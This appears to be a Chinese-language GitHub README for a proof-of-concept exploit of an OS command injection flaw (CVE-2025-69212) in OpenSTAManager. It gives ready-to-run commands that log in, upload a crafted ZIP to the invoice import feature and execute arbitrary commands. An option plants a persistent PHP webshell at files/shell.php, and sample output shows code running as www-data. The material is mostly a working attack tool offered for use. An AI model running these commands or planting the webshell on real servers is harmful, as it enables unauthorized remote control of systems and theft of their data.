alaeddine03/CVE-2025-69212-PoC

GitHub: alaeddine03/CVE-2025-69212-PoC

针对 OpenSTAManager OS 命令注入漏洞(CVE-2025-69212)的概念验证工具,支持远程命令执行和 webshell 植入。

Stars: 0 | Forks: 0

# CVE-2025-69212 - OpenSTAManager OS 命令注入 PoC ## 用法 安装依赖: ``` pip install -r requirements.txt ``` 运行单个命令并打印其输出: ``` python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id' ``` 或者,植入一个持久化的 PHP webshell: ``` python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell ``` ### 选项 | 标志 | 描述 | |---|---| | `-u, --url` | 目标实例的 Base URL | | `-U, --username` | 用于身份认证的 Username | | `-P, --password` | 用于身份认证的 Password | | `-c, --command` | 要执行的命令,输出保存至 `pwn_out.txt` | | `--shell` | 在 `files/shell.php` 植入一个 PHP webshell,而不是运行单个命令 | | `--id-module` | 发票导入功能的 Module ID(默认:14) | | `--id-plugin` | 发票导入功能的 Plugin ID(默认:48) | `id_module` 和 `id_plugin` 是特定于实例的。如果默认值不起作用,请登录目标的 Web UI,导航至电子发票导入功能,并在浏览器的网络选项卡中检查请求参数。 ### 示例输出 ``` $ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id' [*] Logging in as admin ... [+] Authenticated. [*] Building payload to run: id [*] Uploading exploit ZIP to id_module=14 id_plugin=48 ... [*] Server responded: HTTP 500 (500 after command execution is expected) [*] Fetching command output from http://target.com/files/pwn_out.txt ... [+] Command output: -------------------------------------------------- uid=33(www-data) gid=33(www-data) groups=33(www-data) -------------------------------------------------- ```
标签:OS命令注入, PoC, Python, Webshell, 无后门, 暴力破解, 逆向工具